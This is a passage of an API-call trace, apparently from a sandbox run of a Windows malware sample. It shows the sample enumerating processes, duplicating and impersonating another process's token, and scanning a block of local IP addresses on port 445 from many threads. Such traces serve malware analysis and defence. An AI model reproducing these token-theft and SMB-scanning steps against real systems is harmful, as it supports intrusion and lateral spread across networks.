ReturnLength=0x3e7ff1c) returned 1 [0096.386] CloseHandle (hObject=0x438) returned 1 [0096.386] CloseHandle (hObject=0x434) returned 1 [0096.386] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.387] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x434 [0096.387] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.387] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.387] CloseHandle (hObject=0x438) returned 1 [0096.387] CloseHandle (hObject=0x434) returned 1 [0096.387] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.388] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x434 [0096.388] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x0) returned 0 [0096.388] CloseHandle (hObject=0x434) returned 1 [0096.388] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.390] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x434 [0096.390] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.390] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.390] DuplicateToken (in: ExistingTokenHandle=0x438, ImpersonationLevel=0x2, DuplicateTokenHandle=0x3e7ff28 | out: DuplicateTokenHandle=0x3e7ff28*=0x43c) returned 1 [0096.390] SetThreadToken (Thread=0x0, Token=0x43c) returned 1 [0096.390] CloseHandle (hObject=0x43c) returned 1 [0096.390] CloseHandle (hObject=0x438) returned 1 [0096.390] CloseHandle (hObject=0x434) returned 1 [0096.390] CloseHandle (hObject=0x3d4) returned 1 Thread: id = 31 os_tid = 0xb80 [0096.409] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20accc8 [0096.409] free (_Block=0x20accc8) [0096.409] inet_addr (cp="192.168.0.254") returned 0xfe00a8c0 [0096.409] htons (hostshort=0x1bd) returned 0xbd01 [0096.409] socket (af=2, type=1, protocol=6) returned 0x7ac [0097.326] ioctlsocket (in: s=0x7ac, cmd=-2147195266, argp=0x3fbff44 | out: argp=0x3fbff44) returned 0 [0097.326] connect (s=0x7ac, name=0x3fbff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.254"), namelen=16) returned -1 [0097.326] WSAGetLastError () returned 10035 [0097.326] select (nfds=0, readfds=0x0, writefds=0x3fbfd18, exceptfds=0x3fbfe20, timeout=0x3fbff3c*(tv_sec=10, tv_usec=0)) Thread: id = 32 os_tid = 0xb7c [0096.924] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acca0 [0096.924] free (_Block=0x20acca0) [0096.924] inet_addr (cp="192.168.0.253") returned 0xfd00a8c0 [0096.924] htons (hostshort=0x1bd) returned 0xbd01 [0096.924] socket (af=2, type=1, protocol=6) returned 0x84c [0097.364] ioctlsocket (in: s=0x84c, cmd=-2147195266, argp=0x40fff44 | out: argp=0x40fff44) returned 0 [0097.364] connect (s=0x84c, name=0x40fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.253"), namelen=16) returned -1 [0097.364] WSAGetLastError () returned 10035 [0097.364] select (nfds=0, readfds=0x0, writefds=0x40ffd18, exceptfds=0x40ffe20, timeout=0x40fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 33 os_tid = 0xb78 [0096.925] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acc78 [0096.925] free (_Block=0x20acc78) [0096.925] inet_addr (cp="192.168.0.252") returned 0xfc00a8c0 [0096.925] htons (hostshort=0x1bd) returned 0xbd01 [0096.925] socket (af=2, type=1, protocol=6) returned 0x540 [0097.301] ioctlsocket (in: s=0x540, cmd=-2147195266, argp=0x423ff44 | out: argp=0x423ff44) returned 0 [0097.301] connect (s=0x540, name=0x423ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.252"), namelen=16) returned -1 [0097.305] WSAGetLastError () returned 10035 [0097.305] select (nfds=0, readfds=0x0, writefds=0x423fd18, exceptfds=0x423fe20, timeout=0x423ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 34 os_tid = 0xb74 [0096.925] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acc50 [0096.925] free (_Block=0x20acc50) [0096.925] inet_addr (cp="192.168.0.251") returned 0xfb00a8c0 [0096.925] htons (hostshort=0x1bd) returned 0xbd01 [0096.925] socket (af=2, type=1, protocol=6) returned 0x848 [0097.363] ioctlsocket (in: s=0x848, cmd=-2147195266, argp=0x437ff44 | out: argp=0x437ff44) returned 0 [0097.363] connect (s=0x848, name=0x437ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.251"), namelen=16) returned -1 [0097.363] WSAGetLastError () returned 10035 [0097.363] select (nfds=0, readfds=0x0, writefds=0x437fd18, exceptfds=0x437fe20, timeout=0x437ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 35 os_tid = 0xb70 [0096.925] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acc28 [0096.925] free (_Block=0x20acc28) [0096.925] inet_addr (cp="192.168.0.250") returned 0xfa00a8c0 [0096.925] htons (hostshort=0x1bd) returned 0xbd01 [0096.925] socket (af=2, type=1, protocol=6) returned 0x768 [0097.305] ioctlsocket (in: s=0x768, cmd=-2147195266, argp=0x44bff44 | out: argp=0x44bff44) returned 0 [0097.305] connect (s=0x768, name=0x44bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.250"), namelen=16) returned -1 [0097.306] WSAGetLastError () returned 10035 [0097.306] select (nfds=0, readfds=0x0, writefds=0x44bfd18, exceptfds=0x44bfe20, timeout=0x44bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 36 os_tid = 0xb6c [0096.926] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acc00 [0096.926] free (_Block=0x20acc00) [0096.926] inet_addr (cp="192.168.0.249") returned 0xf900a8c0 [0096.926] htons (hostshort=0x1bd) returned 0xbd01 [0096.926] socket (af=2, type=1, protocol=6) returned 0x76c [0097.306] ioctlsocket (in: s=0x76c, cmd=-2147195266, argp=0x45fff44 | out: argp=0x45fff44) returned 0 [0097.306] connect (s=0x76c, name=0x45fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.249"), namelen=16) returned -1 [0097.307] WSAGetLastError () returned 10035 [0097.307] select (nfds=0, readfds=0x0, writefds=0x45ffd18, exceptfds=0x45ffe20, timeout=0x45fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 37 os_tid = 0xb68 [0096.926] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acbd8 [0096.926] free (_Block=0x20acbd8) [0096.926] inet_addr (cp="192.168.0.248") returned 0xf800a8c0 [0096.926] htons (hostshort=0x1bd) returned 0xbd01 [0096.926] socket (af=2, type=1, protocol=6) returned 0x770 [0097.307] ioctlsocket (in: s=0x770, cmd=-2147195266, argp=0x473ff44 | out: argp=0x473ff44) returned 0 [0097.307] connect (s=0x770, name=0x473ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.248"), namelen=16) returned -1 [0097.308] WSAGetLastError () returned 10035 [0097.308] select (nfds=0, readfds=0x0, writefds=0x473fd18, exceptfds=0x473fe20, timeout=0x473ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 38 os_tid = 0xb54 [0096.926] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acbb0 [0096.926] free (_Block=0x20acbb0) [0096.926] inet_addr (cp="192.168.0.247") returned 0xf700a8c0 [0096.926] htons (hostshort=0x1bd) returned 0xbd01 [0096.926] socket (af=2, type=1, protocol=6) returned 0x774 [0097.308] ioctlsocket (in: s=0x774, cmd=-2147195266, argp=0x487ff44 | out: argp=0x487ff44) returned 0 [0097.308] connect (s=0x774, name=0x487ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.247"), namelen=16) returned -1 [0097.308] WSAGetLastError () returned 10035 [0097.308] select (nfds=0, readfds=0x0, writefds=0x487fd18, exceptfds=0x487fe20, timeout=0x487ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 39 os_tid = 0xb30 [0096.927] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acb88 [0096.927] free (_Block=0x20acb88) [0096.927] inet_addr (cp="192.168.0.246") returned 0xf600a8c0 [0096.927] htons (hostshort=0x1bd) returned 0xbd01 [0096.927] socket (af=2, type=1, protocol=6) returned 0x778 [0097.309] ioctlsocket (in: s=0x778, cmd=-2147195266, argp=0x49bff44 | out: argp=0x49bff44) returned 0 [0097.309] connect (s=0x778, name=0x49bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.246"), namelen=16) returned -1 [0097.310] WSAGetLastError () returned 10035 [0097.310] select (nfds=0, readfds=0x0, writefds=0x49bfd18, exceptfds=0x49bfe20, timeout=0x49bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 40 os_tid = 0xb5c [0096.927] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acb60 [0096.927] free (_Block=0x20acb60) [0096.927] inet_addr (cp="192.168.0.245") returned 0xf500a8c0 [0096.927] htons (hostshort=0x1bd) returned 0xbd01 [0096.927] socket (af=2, type=1, protocol=6) returned 0x77c [0097.311] ioctlsocket (in: s=0x77c, cmd=-2147195266, argp=0x4afff44 | out: argp=0x4afff44) returned 0 [0097.311] connect (s=0x77c, name=0x4afff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.245"), namelen=16) returned -1 [0097.311] WSAGetLastError () returned 10035 [0097.311] select (nfds=0, readfds=0x0, writefds=0x4affd18, exceptfds=0x4affe20, timeout=0x4afff3c*(tv_sec=10, tv_usec=0)) Thread: id = 41 os_tid = 0xb2c [0096.927] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acb38 [0096.927] free (_Block=0x20acb38) [0096.927] inet_addr (cp="192.168.0.244") returned 0xf400a8c0 [0096.927] htons (hostshort=0x1bd) returned 0xbd01 [0096.927] socket (af=2, type=1, protocol=6) returned 0x780 [0097.312] ioctlsocket (in: s=0x780, cmd=-2147195266, argp=0x4c3ff44 | out: argp=0x4c3ff44) returned 0 [0097.312] connect (s=0x780, name=0x4c3ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.244"), namelen=16) returned -1 [0097.312] WSAGetLastError () returned 10035 [0097.313] select (nfds=0, readfds=0x0, writefds=0x4c3fd18, exceptfds=0x4c3fe20, timeout=0x4c3ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 42 os_tid = 0xcf0 [0096.928] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acb10 [0096.928] free (_Block=0x20acb10) [0096.928] inet_addr (cp="192.168.0.243") returned 0xf300a8c0 [0096.928] htons (hostshort=0x1bd) returned 0xbd01 [0096.928] socket (af=2, type=1, protocol=6) returned 0x784 [0097.313] ioctlsocket (in: s=0x784, cmd=-2147195266, argp=0x4d7ff44 | out: argp=0x4d7ff44) returned 0 [0097.313] connect (s=0x784, name=0x4d7ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.243"), namelen=16) returned -1 [0097.313] WSAGetLastError () returned 10035 [0097.313] select (nfds=0, readfds=0x0, writefds=0x4d7fd18, exceptfds=0x4d7fe20, timeout=0x4d7ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 43 os_tid = 0xcf4 [0096.928] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acae8 [0096.928] free (_Block=0x20acae8) [0096.928] inet_addr (cp="192.168.0.242") returned 0xf200a8c0 [0096.928] htons (hostshort=0x1bd) returned 0xbd01 [0096.928] socket (af=2, type=1, protocol=6) returned 0x788 [0097.314] ioctlsocket (in: s=0x788, cmd=-2147195266, argp=0x4ebff44 | out: argp=0x4ebff44) returned 0 [0097.314] connect (s=0x788, name=0x4ebff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.242"), namelen=16) returned -1 [0097.314] WSAGetLastError () returned 10035 [0097.314] select (nfds=0, readfds=0x0, writefds=0x4ebfd18, exceptfds=0x4ebfe20, timeout=0x4ebff3c*(tv_sec=10, tv_usec=0)) Thread: id = 44 os_tid = 0xcec [0096.928] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20acac0 [0096.928] free (_Block=0x20acac0) [0096.928] inet_addr (cp="192.168.0.241") returned 0xf100a8c0 [0096.928] htons (hostshort=0x1bd) returned 0xbd01 [0096.928] socket (af=2, type=1, protocol=6) returned 0x78c [0097.315] ioctlsocket (in: s=0x78c, cmd=-2147195266, argp=0x4ffff44 | out: argp=0x4ffff44) returned 0 [0097.316] connect (s=0x78c, name=0x4ffff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.241"), namelen=16) returned -1 [0097.316] WSAGetLastError () returned 10035 [0097.316] select (nfds=0, readfds=0x0, writefds=0x4fffd18, exceptfds=0x4fffe20, timeout=0x4ffff3c*(tv_sec=10, tv_usec=0)) Thread: id = 45 os_tid = 0xce8 [0096.929] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20aca98 [0096.929] free (_Block=0x20aca98) [0096.929] inet_addr (cp="192.168.0.240") returned 0xf000a8c0 [0096.929] htons (hostshort=0x1bd) returned 0xbd01 [0096.929] socket (af=2, type=1, protocol=6) returned 0x790 [0097.316] ioctlsocket (in: s=0x790, cmd=-2147195266, argp=0x513ff44 | out: argp=0x513ff44) returned 0 [0097.316] connect (s=0x790, name=0x513ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.240"), namelen=16) returned -1 [0097.317] WSAGetLastError () returned 10035 [0097.317] select (nfds=0, readfds=0x0, writefds=0x513fd18, exceptfds=0x513fe20, timeout=0x513ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 46 os_tid = 0xce4 [0096.929] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20aca70 [0096.929] free (_Block=0x20aca70) [0096.929] inet_addr (cp="192.168.0.239") returned 0xef00a8c0 [0096.929] htons (hostshort=0x1bd) returned 0xbd01 [0096.929] socket (af=2, type=1, protocol=6) returned 0x794 [0097.317] ioctlsocket (in: s=0x794, cmd=-2147195266, argp=0x527ff44 | out: argp=0x527ff44) returned 0 [0097.317] connect (s=0x794, name=0x527ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.239"), namelen=16) returned -1 [0097.318] WSAGetLastError () returned 10035 [0097.318] select (nfds=0, readfds=0x0, writefds=0x527fd18, exceptfds=0x527fe20, timeout=0x527ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 47 os_tid = 0x234 [0096.929] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20aca48 [0096.930] free (_Block=0x20aca48) [0096.930] inet_addr (cp="192.168.0.238") returned 0xee00a8c0 [0096.930] htons (hostshort=0x1bd) returned 0xbd01 [0096.930] socket (af=2, type=1, protocol=6) returned 0x798 [0097.318] ioctlsocket (in: s=0x798, cmd=-2147195266, argp=0x53bff44 | out: argp=0x53bff44) returned 0 [0097.318] connect (s=0x798, name=0x53bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.238"), namelen=16) returned -1 [0097.319] WSAGetLastError () returned 10035 [0097.319] select (nfds=0, readfds=0x0, writefds=0x53bfd18, exceptfds=0x53bfe20, timeout=0x53bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 48 os_tid = 0x8f4 [0096.930] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20aca20 [0096.930] free (_Block=0x20aca20) [0096.930] inet_addr (cp="192.168.0.237") returned 0xed00a8c0 [0096.930] htons (hostshort=0x1bd) returned 0xbd01 [0096.930] socket (af=2, type=1, protocol=6) returned 0x79c [0097.319] ioctlsocket (in: s=0x79c, cmd=-2147195266, argp=0x54fff44 | out: argp=0x54fff44) returned 0 [0097.319] connect (s=0x79c, name=0x54fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.237"), namelen=16) returned -1 [0097.320] WSAGetLastError () returned 10035 [0097.320] select (nfds=0, readfds=0x0, writefds=0x54ffd18, exceptfds=0x54ffe20, timeout=0x54fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 49 os_tid = 0xd44 [0096.930] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac9f8 [0096.930] free (_Block=0x20ac9f8) [0096.930] inet_addr (cp="192.168.0.235") returned 0xeb00a8c0 [0096.930] htons (hostshort=0x1bd) returned 0xbd01 [0096.930] socket (af=2, type=1, protocol=6) returned 0x7a0 [0097.320] ioctlsocket (in: s=0x7a0, cmd=-2147195266, argp=0x563ff44 | out: argp=0x563ff44) returned 0 [0097.320] connect (s=0x7a0, name=0x563ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.235"), namelen=16) returned -1 [0097.321] WSAGetLastError () returned 10035 [0097.321] select (nfds=0, readfds=0x0, writefds=0x563fd18, exceptfds=0x563fe20, timeout=0x563ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 50 os_tid = 0x8e4 [0096.931] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac9d0 [0096.931] free (_Block=0x20ac9d0) [0096.931] inet_addr (cp="192.168.0.234") returned 0xea00a8c0 [0096.931] htons (hostshort=0x1bd) returned 0xbd01 [0096.931] socket (af=2, type=1, protocol=6) returned 0x7a4 [0097.321] ioctlsocket (in: s=0x7a4, cmd=-2147195266, argp=0x577ff44 | out: argp=0x577ff44) returned 0 [0097.321] connect (s=0x7a4, name=0x577ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.234"), namelen=16) returned -1 [0097.324] WSAGetLastError () returned 10035 [0097.324] select (nfds=0, readfds=0x0, writefds=0x577fd18, exceptfds=0x577fe20, timeout=0x577ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 51 os_tid = 0x8e8 [0096.931] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac9a8 [0096.931] free (_Block=0x20ac9a8) [0096.931] inet_addr (cp="192.168.0.233") returned 0xe900a8c0 [0096.931] htons (hostshort=0x1bd) returned 0xbd01 [0096.931] socket (af=2, type=1, protocol=6) returned 0x7a8 [0097.324] ioctlsocket (in: s=0x7a8, cmd=-2147195266, argp=0x58bff44 | out: argp=0x58bff44) returned 0 [0097.324] connect (s=0x7a8, name=0x58bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.233"), namelen=16) returned -1 [0097.325] WSAGetLastError () returned 10035 [0097.325] select (nfds=0, readfds=0x0, writefds=0x58bfd18, exceptfds=0x58bfe20, timeout=0x58bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 52 os_tid = 0x8ec [0097.285] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac980 [0097.285] free (_Block=0x20ac980) [0097.285] inet_addr (cp="192.168.0.232") returned 0xe800a8c0 [0097.285] htons (hostshort=0x1bd) returned 0xbd01 [0097.285] socket (af=2, type=1, protocol=6) returned 0x7b0 [0097.328] ioctlsocket (in: s=0x7b0, cmd=-2147195266, argp=0x59fff44 | out: argp=0x59fff44) returned 0 [0097.328] connect (s=0x7b0, name=0x59fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.232"), namelen=16) returned -1 [0097.328] WSAGetLastError () returned 10035 [0097.328] select (nfds=0, readfds=0x0, writefds=0x59ffd18, exceptfds=0x59ffe20, timeout=0x59fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 53 os_tid = 0x8f0 [0096.935] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x5b3ff48 | out: TokenHandle=0x5b3ff48*=0x530) returned 1 [0096.935] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x12, TokenInformation=0x5b3ff44, TokenInformationLength=0x4, ReturnLength=0x5b3ff4c | out: TokenInformation=0x5b3ff44, ReturnLength=0x5b3ff4c) returned 1 [0096.935] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x13, TokenInformation=0x5b3ff44, TokenInformationLength=0x4, ReturnLength=0x5b3ff4c | out: TokenInformation=0x5b3ff44, ReturnLength=0x5b3ff4c) returned 1 [0096.935] GetTokenInformation (in: TokenHandle=0x534, TokenInformationClass=0xa, TokenInformation=0x5b3ff50, TokenInformationLength=0x38, ReturnLength=0x5b3ff4c | out: TokenInformation=0x5b3ff50, ReturnLength=0x5b3ff4c) returned 1 [0096.935] CloseHandle (hObject=0x534) returned 1 [0096.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x534 [0096.940] Process32FirstW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.941] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0096.941] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.943] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x538 [0096.943] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x0) returned 0 [0096.943] CloseHandle (hObject=0x538) returned 1 [0096.943] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.945] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x538 [0096.945] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.945] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.945] CloseHandle (hObject=0x53c) returned 1 [0096.945] CloseHandle (hObject=0x538) returned 1 [0096.945] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.946] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x538 [0096.946] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.947] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.947] CloseHandle (hObject=0x53c) returned 1 [0096.947] CloseHandle (hObject=0x538) returned 1 [0096.947] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.948] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x538 [0096.948] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.948] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.948] CloseHandle (hObject=0x53c) returned 1 [0096.948] CloseHandle (hObject=0x538) returned 1 [0096.948] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.950] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x538 [0096.950] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.950] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.950] CloseHandle (hObject=0x53c) returned 1 [0096.950] CloseHandle (hObject=0x538) returned 1 [0096.950] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.951] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x538 [0096.951] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.951] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.951] CloseHandle (hObject=0x53c) returned 1 [0096.951] CloseHandle (hObject=0x538) returned 1 [0096.952] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.953] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x538 [0096.953] 